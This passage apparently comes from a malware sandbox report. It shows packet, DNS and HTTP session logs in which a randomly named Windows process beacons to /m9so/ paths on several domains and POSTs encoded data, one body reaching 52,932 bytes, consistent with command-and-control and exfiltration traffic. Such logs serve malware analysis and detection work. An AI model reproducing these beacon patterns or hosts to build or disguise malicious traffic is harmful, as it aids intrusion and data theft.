                                                                                    Mar 18, 2024 14:54:10.084286928 CET804982884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:10.084331036 CET4982880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:10.084331036 CET4982880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:10.084422112 CET4982880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:10.084667921 CET4982880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:10.084898949 CET4982880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:10.239223957 CET804982884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:15.584789038 CET4982980192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:15.768079042 CET8049829195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:15.768378019 CET4982980192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:15.768569946 CET4982980192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:15.951980114 CET8049829195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:15.955194950 CET8049829195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:15.955257893 CET8049829195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:15.955425978 CET4982980192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:17.270733118 CET4982980192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:18.286521912 CET4983080192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:18.470496893 CET8049830195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:18.470726013 CET4983080192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:18.470972061 CET4983080192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:18.654448032 CET8049830195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:18.658966064 CET8049830195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:18.659050941 CET8049830195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:18.659301043 CET4983080192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:19.973370075 CET4983080192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:20.988908052 CET4983180192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:21.172415018 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.172647953 CET4983180192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:21.174032927 CET4983180192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:21.357346058 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.357430935 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.357472897 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.357511044 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.357599020 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.357616901 CET4983180192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:21.357641935 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.357701063 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.357738972 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.357777119 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.357786894 CET4983180192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:21.357956886 CET4983180192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:21.357975960 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.358125925 CET4983180192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:21.358292103 CET4983180192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:21.540994883 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.541306973 CET4983180192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:21.541527033 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.541585922 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.541629076 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.541666985 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.541738987 CET4983180192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:21.541884899 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.541913986 CET4983180192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:21.541925907 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.542082071 CET4983180192.168.11.20195.110.124.133
                                                                                    Mar 18, 2024 14:54:21.542085886 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.542287111 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.542474985 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.542622089 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.585160017 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.725169897 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.725624084 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.725682020 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.726161003 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.726222992 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.726265907 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.726305962 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.726344109 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.728085041 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.728147984 CET8049831195.110.124.133192.168.11.20
                                                                                    Mar 18, 2024 14:54:21.728352070 CET4983180192.168.11.20195.110.124.133
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                    Mar 18, 2024 14:52:11.375252008 CET53513261.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:52:24.780528069 CET6019853192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:52:25.795288086 CET6019853192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:52:26.189543962 CET53601989.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:52:28.133424997 CET53601981.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:53:53.516031027 CET6544453192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:53:53.618843079 CET53654449.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:54:01.540231943 CET5506253192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:54:01.727125883 CET53550629.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:54:15.099772930 CET5379353192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:54:15.584105968 CET53537939.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:54:37.626123905 CET6245153192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:54:38.641098022 CET6245153192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:39.656415939 CET6245153192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:54:41.671636105 CET6245153192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:41.671636105 CET6245153192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:54:42.770277977 CET53624519.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:54:45.686364889 CET6245153192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:46.384555101 CET53624519.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:54:46.578174114 CET53624511.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:54:46.578226089 CET53624511.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:54:46.578243017 CET53624511.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:54:47.389375925 CET5346453192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:54:47.493819952 CET53534649.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:54:47.494154930 CET5346453192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:48.498336077 CET5346453192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:50.513340950 CET5346453192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:54.528219938 CET5346453192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:55.435451031 CET53534641.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:54:55.435509920 CET53534641.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:54:55.435544968 CET53534641.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:54:55.435576916 CET53534641.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:54:56.449911118 CET4970153192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:54:56.550045013 CET53497019.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:54:56.551126957 CET4970153192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:57.558706999 CET4970153192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:59.573959112 CET4970153192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:55:01.647998095 CET53497011.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:55:01.648010969 CET53497011.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:55:01.648019075 CET53497011.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:55:02.651967049 CET6493653192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:55:02.753537893 CET53649369.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:55:02.753824949 CET6493653192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:55:03.760512114 CET6493653192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:55:04.488394022 CET53649361.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:55:04.488409996 CET53649361.1.1.1192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                    Mar 18, 2024 14:54:46.578174114 CET1.1.1.1192.168.11.200x4349Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:46.578226089 CET1.1.1.1192.168.11.200x4349Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:46.578243017 CET1.1.1.1192.168.11.200x4349Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:47.493819952 CET9.9.9.9192.168.11.200x3e41Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:55.435451031 CET1.1.1.1192.168.11.200x3e41Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:55.435509920 CET1.1.1.1192.168.11.200x3e41Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:55.435544968 CET1.1.1.1192.168.11.200x3e41Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:55.435576916 CET1.1.1.1192.168.11.200x3e41Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:56.550045013 CET9.9.9.9192.168.11.200xb88cServer failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:55:01.647998095 CET1.1.1.1192.168.11.200xb88cServer failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:55:01.648010969 CET1.1.1.1192.168.11.200xb88cServer failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:55:01.648019075 CET1.1.1.1192.168.11.200xb88cServer failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:55:02.753537893 CET9.9.9.9192.168.11.200xa5a4Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:55:04.488394022 CET1.1.1.1192.168.11.200xa5a4Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:55:04.488409996 CET1.1.1.1192.168.11.200xa5a4Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
0           192.168.11.20  49778        172.67.158.92   80                7756  C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 18, 2024 14:47:52.396598101 CET  534                OUT        GET /m9so/?LFPxWlV=9P8aNyK7O05KJ0jKHbPRuL/6tE36LZhqsdPS0VQWTno4TxKFvlSv59XV3DTl0RUh0Aj2hIyEwvndA3yjgkFupZwaxdFmxRojdXOoN+OGLdCgXGIMDQ+6EgE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.noonartists.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:47:52.514048100 CET  1286               IN         HTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 18 Mar 2024 13:47:52 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    location: https://www.noonartists.com/m9so/?LFPxWlV=9P8aNyK7O05KJ0jKHbPRuL/6tE36LZhqsdPS0VQWTno4TxKFvlSv59XV3DTl0RUh0Aj2hIyEwvndA3yjgkFupZwaxdFmxRojdXOoN+OGLdCgXGIMDQ+6EgE=&OBLTJ=U4yhXH6x-jhX
                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KCMmW9oPgC6Sk1Gs%2F3DIzSGh4vEkCEJaK4nd6j%2FsU5Egw75e%2BL4NLfQXX%2F4OPmUgLG8SMbMdv2ILgdAX9ZmVD5%2F2e4b54c9OVAzRhIjViHmHmBMPzOlou400W4XfNXMsBHa8PG7w"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8665ad54cf164349-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    Data Ascii: 2c3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
Mar 18, 2024 14:47:52.514060020 CET  232                IN
                                                                                    Data Ascii: <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
Mar 18, 2024 14:47:52.514070034 CET  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


Session ID  Source IP      Source Port  Destination IP   Destination Port  PID   Process
1           192.168.11.20  49782        198.177.123.106  80                7756  C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 18, 2024 14:48:47.962356091 CET  811                OUT        POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.alpinebretech.life
                                                                                    Origin: http://www.alpinebretech.life
                                                                                    Referer: http://www.alpinebretech.life/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Ascii: LFPxWlV=ghHQ3Gr/MCFEJIF1V+fsXpQv9jMxY6cVPEohCq3lYpLIcd0NALEAdhzD3pofETXqTE/faxFbZGWcdAsJFywp3xXtzaw1KTmFJPuGddd/DWW9oXpitRid0Wqn7aWJP3n61/FIxEv6RM0KCsMjs9NLKc85C4BVvx0Dh4TovjAsMYafTh1euw3HgtZECo5PgjcRww==
Mar 18, 2024 14:48:48.272150040 CET  169                IN         HTTP/1.0 500 Internal Server Error
                                                                                    Date: Mon, 18 Mar 2024 13:48:48 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


Session ID  Source IP      Source Port  Destination IP   Destination Port  PID   Process
2           192.168.11.20  49783        198.177.123.106  80                7756  C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 18, 2024 14:48:50.665934086 CET  1151               OUT        POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.alpinebretech.life
                                                                                    Origin: http://www.alpinebretech.life
                                                                                    Referer: http://www.alpinebretech.life/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:48:50.967921972 CET  169                IN         HTTP/1.0 500 Internal Server Error
                                                                                    Date: Mon, 18 Mar 2024 13:48:50 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


Session ID  Source IP      Source Port  Destination IP   Destination Port  PID   Process
3           192.168.11.20  49784        198.177.123.106  80                7756  C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 18, 2024 14:48:53.363547087 CET  7716               OUT        POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.alpinebretech.life
                                                                                    Origin: http://www.alpinebretech.life
                                                                                    Referer: http://www.alpinebretech.life/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:48:53.712317944 CET2572OUTData Raw: 63 51 6a 68 47 57 35 4c 30 69 68 6f 30 71 32 48 56 4c 43 48 55 53 4c 53 2b 4c 36 4c 63 6d 74 39 35 34 4c 4b 52 70 78 61 61 56 78 33 4f 75 6a 6e 42 4a 65 45 31 52 66 36 30 30 79 2b 47 51 61 4e 66 30 4d 64 6e 6c 76 62 6d 51 46 74 30 34 58 53 78 2b
                                                                                    Data Ascii: cQjhGW5L0iho0q2HVLCHUSLS+L6Lcmt954LKRpxaaVx3OujnBJeE1Rf600y+GQaNf0MdnlvbmQFt04XSx+HB8B4TS6e/6bSlx8YJYmPpdGQlLl05LA/OL6xxWT4NDXkdsBk4OUSrTucHxXlMsJ58kqRKhQGUTnc6kim88XDQQBIrFU4n3d4Q7DavvChlTNTA8R53EzANa8fLJJTzoKq8yApjOX5HCjeReN7y7a6vkvvA6Kc64I4
                                                                                    Mar 18, 2024 14:48:53.712488890 CET5144OUTData Raw: 53 67 52 4a 55 52 58 59 7a 6e 6b 48 66 6f 46 46 65 4f 34 79 58 37 52 39 75 30 50 4a 4e 63 4f 71 73 64 57 33 34 55 67 5a 62 47 79 6f 66 33 6f 50 73 6f 33 32 33 54 69 53 65 71 39 2f 34 58 57 33 57 33 45 57 64 61 59 38 50 53 48 43 73 39 78 44 2f 30
                                                                                    Data Ascii: SgRJURXYznkHfoFFeO4yX7R9u0PJNcOqsdW34UgZbGyof3oPso323TiSeq9/4XW3W3EWdaY8PSHCs9xD/06GWTz+5PVqADILHI6btIbJnTp98qXjM0v4gjGxh8XCMOSCp9Xlvu6U3HPq2zbJhDmp6DphBmAcZxGy3Nco2rvCBMOEw8aJv27LfgeOQtvhr37CctTozlDt7jqRVdCZk41sXBEEiBctxXNrQyLHN+SDusDhfR9vTZ0
                                                                                    Mar 18, 2024 14:48:54.022317886 CET | 169 | IN | HTTP/1.0 500 Internal Server Error
                                                                                    Date: Mon, 18 Mar 2024 13:48:53 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    4 | 192.168.11.20 | 49786 | 198.177.123.106 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 14:48:56.063123941 CET | 537 | OUT | GET /m9so/?LFPxWlV=tjvw02avMThAA8QJc7LpbKc0nVcyZYwiX1IZCpHHMcL/Cok/Fa8Xeiv0sI0YHyzKdXCYczJiWU6WICcQRxIhuBT/mPwaKCG7CcvbddJeMhWanndbuRu1+zE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.alpinebretech.life
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:48:56.349569082 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 18 Mar 2024 13:48:56 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    5 | 192.168.11.20 | 49787 | 46.30.215.63 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 14:49:01.784764051 CET | 796 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.manupaint.com
                                                                                    Origin: http://www.manupaint.com
                                                                                    Referer: http://www.manupaint.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Ascii: LFPxWlV=r48SsX4TqZuGxlExuRfVrXz3uT/77d2tLEqPfGMvF+W1pMH7h16XV+I7JZwhXl9eL64UCSTQxF9xl87bYGqgRWO3sPZhFvcmRTRwxCm9b4TDKbn1eWt7vZBzsEp8vdTXuWJ/MdXfeW6KUbxV+zF37E6TVLzDSbjXlHGchzXI/q9qgmfoVg83ifgNWNPsDgxMtg==
                                                                                    Mar 18, 2024 14:49:01.965683937 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                    Cache-Control: max-age:600, public
                                                                                    Content-Length: 454
                                                                                    Expires: Mon, 18 Mar 2024 13:59:01 GMT
                                                                                    Last-Modified: Mon, 18 Mar 2024 13:49:01 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:49:01 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    X-Onecom-Cluster-Name:
                                                                                    X-Varnish: 56032461030
                                                                                    Age: 0
                                                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                                                    Connection: close
                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>"www.manupaint.com"</title><style type="text/css">body {margin:0;padding:0;}iframe {display: block;border: none;height: 100vh;width: 100vw;}</style></head><body><iframe src= "https://pintura.mypresta.shop/m9so/"><p>Your user agent does not support iframes. However you may visit <a href="https://pintura.mypresta.shop/m9so/">the page that was supposed to be here</a></p></iframe></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    6 | 192.168.11.20 | 49788 | 46.30.215.63 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 14:49:04.487514973 CET | 1136 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.manupaint.com
                                                                                    Origin: http://www.manupaint.com
                                                                                    Referer: http://www.manupaint.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:49:04.667092085 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                    Cache-Control: max-age:600, public
                                                                                    Content-Length: 454
                                                                                    Expires: Mon, 18 Mar 2024 13:59:04 GMT
                                                                                    Last-Modified: Mon, 18 Mar 2024 13:49:04 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:49:04 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    X-Onecom-Cluster-Name:
                                                                                    X-Varnish: 56049500387
                                                                                    Age: 0
                                                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                                                    Connection: close
